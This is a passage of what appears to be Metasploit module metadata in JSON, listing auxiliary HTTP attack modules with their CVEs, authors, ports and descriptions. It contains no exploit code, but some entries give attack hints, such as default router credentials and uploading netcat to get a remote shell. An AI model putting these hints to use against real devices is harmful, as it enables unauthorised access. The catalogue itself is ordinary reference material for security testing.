"full_name": "auxiliary/admin/http/cfme_manageiq_evm_pass_reset",
"rank": 300,
"disclosure_date": "2013-11-12",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a SQL injection vulnerability in the \"explorer\"\n action of \"miq_policy\" controller of the Red Hat CloudForms Management\n Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by\n changing the password of the target account to the specified password.",
"references": [
"CVE-2013-2050",
"CWE-89",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=959062"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/cfme_manageiq_evm_pass_reset",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/cnpilot_r_cmd_exec": {
"name": "Cambium cnPilot r200/r201 Command Execution as 'root'",
"full_name": "auxiliary/admin/http/cnpilot_r_cmd_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n accessible via a specific url, to any authenticated user. The module uses this\n shell to execute arbitrary system commands as 'root'.",
"references": [
"CVE-2017-5259",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:53:02 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/cnpilot_r_fpt": {
"name": "Cambium cnPilot r200/r201 File Path Traversal",
"full_name": "auxiliary/admin/http/cnpilot_r_fpt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. Affected\n versions - 4.3.3-R4 and prior.",
"references": [
"CVE-2017-5261",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:53:02 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_fpt",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/contentkeeper_fileaccess": {
"name": "ContentKeeper Web Appliance mimencode File Access",
"full_name": "auxiliary/admin/http/contentkeeper_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.",
"references": [
"OSVDB-54551",
"URL-http://www.aushack.com/200904-contentkeeper.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/http/contentkeeper_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/dlink_dir_300_600_exec_noauth": {
"name": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution",
"full_name": "auxiliary/admin/http/dlink_dir_300_600_exec_noauth",
"rank": 300,
"disclosure_date": "2013-02-04",
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.",
"references": [
"OSVDB-89861",
"EDB-24453",
"URL-http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
"URL-http://www.s3cur1ty.de/home-network-horror-days",
"URL-http://www.s3cur1ty.de/m1adv2013-003"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_300_600_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/dlink_dir_645_password_extractor": {
"name": "D-Link DIR 645 Password Extractor",
"full_name": "auxiliary/admin/http/dlink_dir_645_password_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Roberto Paleari <roberto@greyhats.it>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.",
"references": [
"OSVDB-90733",
"BID-58231",
"PACKETSTORM-120591"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_645_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/dlink_dsl320b_password_extractor": {
"name": "D-Link DSL 320B Password Extractor",
"full_name": "auxiliary/admin/http/dlink_dsl320b_password_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an authentication bypass vulnerability in D-Link DSL 320B\n <=v1.23. This vulnerability allows to extract the credentials for the remote\n management interface.",
"references": [
"EDB-25252",
"OSVDB-93013",
"URL-http://www.s3cur1ty.de/m1adv2013-018"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dsl320b_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/foreman_openstack_satellite_priv_esc": {
"name": "Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",
"full_name": "auxiliary/admin/http/foreman_openstack_satellite_priv_esc",
"rank": 300,
"disclosure_date": "2013-06-06",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a mass assignment vulnerability in the 'create'\n action of 'users' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator\n account. For this exploit to work, your account must have 'create_users'\n permission (e.g., Manager role).",
"references": [
"BID-60835",
"CVE-2013-2113",
"CWE-915",
"OSVDB-94655",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=966804",
"URL-http://projects.theforeman.org/issues/2630"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/foreman_openstack_satellite_priv_esc",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/gitstack_rest": {
"name": "GitStack Unauthenticated REST API Requests",
"full_name": "auxiliary/admin/http/gitstack_rest",
"rank": 300,
"disclosure_date": "2018-01-15",
"type": "auxiliary",
"author": [
"Kacper Szurek",
"Jacob Robles"
],
"description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. This module has been tested against GitStack v2.3.10.",
"references": [
"CVE-2018-5955",
"EDB-43777",
"EDB-44044"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-03-09 07:43:12 +0000",
"path": "/modules/auxiliary/admin/http/gitstack_rest.rb",
"is_install_path": true,
"ref_name": "admin/http/gitstack_rest",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/hp_web_jetadmin_exec": {
"name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution",
"full_name": "auxiliary/admin/http/hp_web_jetadmin_exec",
"rank": 300,
"disclosure_date": "2004-04-27",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.",
"references": [
"OSVDB-5798",
"BID-10224",
"EDB-294"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/hp_web_jetadmin_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/iis_auth_bypass": {
"name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass",
"full_name": "auxiliary/admin/http/iis_auth_bypass",
"rank": 300,
"disclosure_date": "2010-07-02",
"type": "auxiliary",
"author": [
"Soroush Dalili",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.",
"references": [
"CVE-2010-2731",
"OSVDB-66160",
"MSB-MS10-065",
"URL-http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/iis_auth_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/intersil_pass_reset": {
"name": "Intersil (Boa) HTTPd Basic Authentication Password Reset",
"full_name": "auxiliary/admin/http/intersil_pass_reset",
"rank": 300,
"disclosure_date": "2007-09-10",
"type": "auxiliary",
"author": [
"Luca \"ikki\" Carettoni <luca.carettoni@securenetwork.it>",
"Claudio \"paper\" Merloni <claudio.merloni@securenetwork.it>",
"Max Dietz <maxwell.r.dietz@gmail.com>"
],
"description": "The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11\n allows basic authentication bypass when the user string is greater\n than 127 bytes long. The long string causes the password to be\n overwritten in memory, which enables the attacker to reset the\n password. In addition, the malicious attempt also may cause a\n denial-of-service condition.\n\n Please note that you must set the request URI to the directory that\n requires basic authentication in order to work properly.",
"references": [
"CVE-2007-4915",
"BID-25676",
"PACKETSTORM-59347"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-08 19:00:11 +0000",
"path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/intersil_pass_reset",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/iomega_storcenterpro_sessionid": {
"name": "Iomega StorCenter Pro NAS Web Authentication Bypass",
"full_name": "auxiliary/admin/http/iomega_storcenterpro_sessionid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,\n allowing for simple brute force attacks to bypass authentication and gain administrative\n access.",
"references": [
"OSVDB-55586",
"CVE-2009-2367"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb",
"is_install_path": true,
"ref_name": "admin/http/iomega_storcenterpro_sessionid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/jboss_bshdeployer": {
"name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",
"full_name": "auxiliary/admin/http/jboss_bshdeployer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer's createScriptDeployment() method.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_bshdeployer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/jboss_deploymentfilerepository": {
"name": "JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment",
"full_name": "auxiliary/admin/http/jboss_deploymentfilerepository",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module uses the DeploymentFileRepository class in the JBoss Application Server\n to deploy a JSP file which then deploys an arbitrary WAR file.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_deploymentfilerepository",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/jboss_seam_exec": {
"name": "JBoss Seam 2 Remote Command Execution",
"full_name": "auxiliary/admin/http/jboss_seam_exec",
"rank": 300,
"disclosure_date": "2010-07-19",
"type": "auxiliary",
"author": [
"guerrino di massa",
"Cristiano Maruti <cmaruti@gmail.com>"
],
"description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This modules also has been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.",
"references": [
"CVE-2010-1871",
"OSVDB-66881"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_seam_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/joomla_registration_privesc": {
"name": "Joomla Account Creation and Privilege Escalation",
"full_name": "auxiliary/admin/http/joomla_registration_privesc",
"rank": 300,
"disclosure_date": "2016-10-25",
"type": "auxiliary",
"author": [
"Fabio Pires <fp@integrity.pt>",
"Filipe Reis <fr@integrity.pt>",
"Vitor Oliveira <vo@integrity.pt>"
],
"description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).",
"references": [
"CVE-2016-8869",
"CVE-2016-8870",
"URL-https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html",
"URL-https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html",
"URL-https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/joomla_registration_privesc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/kaseya_master_admin": {
"name": "Kaseya VSA Master Administrator Account Creation",
"full_name": "auxiliary/admin/http/kaseya_master_admin",
"rank": 300,
"disclosure_date": "2015-09-23",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.",
"references": [
"CVE-2015-6922",
"ZDI-15-448",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt",
"URL-https://seclists.org/bugtraq/2015/Sep/132"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/kaseya_master_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/katello_satellite_priv_esc": {
"name": "Katello (Red Hat Satellite) users/update_roles Missing Authorization",
"full_name": "auxiliary/admin/http/katello_satellite_priv_esc",
"rank": 300,
"disclosure_date": "2014-03-24",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a missing authorization vulnerability in the\n \"update_roles\" action of \"users\" controller of Katello and Red Hat Satellite\n (Katello 1.5.0-14 and earlier) by changing the specified account to an\n administrator account.",
"references": [
"CVE-2013-2143",
"CWE-862",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=970849"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/katello_satellite_priv_esc",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/limesurvey_file_download": {
"name": "Limesurvey Unauthenticated File Download",
"full_name": "auxiliary/admin/http/limesurvey_file_download",
"rank": 300,
"disclosure_date": "2015-10-12",
"type": "auxiliary",
"author": [
"Pichaya Morimoto",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.",
"references": [
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20151022-0_Lime_Survey_multiple_critical_vulnerabilities_v10.txt",
"URL-https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015",
"URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/limesurvey_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/linksys_e1500_e2500_exec": {
"name": "Linksys E1500/E2500 Remote Command Execution",
"full_name": "auxiliary/admin/http/linksys_e1500_e2500_exec",
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.",
"references": [
"OSVDB-89912",
"BID-57760",
"EDB-24475",
"URL-http://www.s3cur1ty.de/m1adv2013-004"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_e1500_e2500_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/linksys_tmunblock_admin_reset_bof": {
"name": "Linksys WRT120N tmUnblock Stack Buffer Overflow",
"full_name": "auxiliary/admin/http/linksys_tmunblock_admin_reset_bof",
"rank": 300,
"disclosure_date": "2014-02-19",
"type": "auxiliary",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.",
"references": [
"EDB-31758",
"OSVDB-103521",
"URL-http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_tmunblock_admin_reset_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/linksys_wrt54gl_exec": {
"name": "Linksys WRT54GL Remote Command Execution",
"full_name": "auxiliary/admin/http/linksys_wrt54gl_exec",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.",
"references": [
"URL-http://www.s3cur1ty.de/m1adv2013-01",
"URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl",
"EDB-24202",
"BID-57459",
"OSVDB-89421"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_wrt54gl_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/manage_engine_dc_create_admin": {
"name": "ManageEngine Desktop Central Administrator Account Creation",
"full_name": "auxiliary/admin/http/manage_engine_dc_create_admin",
"rank": 300,
"disclosure_date": "2014-12-31",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.",
"references": [
"CVE-2014-7862",
"OSVDB-116554",
"URL-https://seclists.org/fulldisclosure/2015/Jan/2",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt"
],
"platform": "",
"arch": "",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/manage_engine_dc_create_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/manageengine_dir_listing": {
"name": "ManageEngine Multiple Products Arbitrary Directory Listing",
"full_name": "auxiliary/admin/http/manageengine_dir_listing",
"rank": 300,
"disclosure_date": "2015-01-28",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.",
"references": [
"CVE-2014-7863",
"OSVDB-117696",
"URL-https://seclists.org/fulldisclosure/2015/Jan/114",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_dir_listing",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/manageengine_file_download": {
"name": "ManageEngine Multiple Products Arbitrary File Download",
"full_name": "auxiliary/admin/http/manageengine_file_download",
"rank": 300,
"disclosure_date": "2015-01-28",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.",
"references": [
